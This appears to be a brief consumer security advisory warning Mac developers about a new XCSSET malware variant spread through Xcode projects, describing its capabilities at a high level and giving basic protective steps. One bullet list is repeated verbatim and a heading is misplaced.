I wanted to share this news with you if you use Xcode on a Mac. Microsoft reported a new type of malware, XCSSET, that targets developers.
• Firefox attack: It is now targeting Firefox using a tool called HackBrowserData. This means it is able to read your Firefox and take the data you have stored in this browser.
• Crypto theft: It now watches your clipboard. If you copy a transfer address for a crypto transaction, the malware could swap it out with the hacker's address, so instead of sending your funds to the recipient, it goes to the hacker's address.
• Camouflage better: The latest version creates fake files and applications, such as a fake "System Settings" application, so you are not aware the malware operation is happening in the background.
• Stays on your Mac: It creates hidden tasks that run even when you reboot.
Here’s how you can protect yourself:
What is XCSSET?
XCSSET is malware (bad software) that can:- Steal data like browser history, saved passwords, and even crypto wallets.
- Spread via Xcode projects. If you receive an infected project and open/build it, the malware executes right away.
What has changed in this version?
The latest version is significantly more dangerous. Here are the changes:• Firefox attack: It is now targeting Firefox using a tool called HackBrowserData. This means it is able to read your Firefox and take the data you have stored in this browser.
• Crypto theft: It now watches your clipboard. If you copy a transfer address for a crypto transaction, the malware could swap it out with the hacker's address, so instead of sending your funds to the recipient, it goes to the hacker's address.
• Camouflage better: The latest version creates fake files and applications, such as a fake "System Settings" application, so you are not aware the malware operation is happening in the background.
• Stays on your Mac: It creates hidden tasks that run even when you reboot.
How worried should you be?
Microsoft says it's not yet spreading globally, though that could change quickly -- better safe than sorry!Here’s how you can protect yourself:
- Continuously upgrade macOS and Xcode. It’s common for these types of updates to fix major security holes.
- Make sure to review projects before you build them. If you are seeing something odd in a project, like strange files or scripts that you did not create, take caution.
- Be wary using shared repos or code from someone unknown to you.
- Monitor your Mac for unusual activity. If you are seeing apps you’ve never seen, Daemons or other processes you have never seen, or high cpu usage without any reason that could be a sign that something is amiss.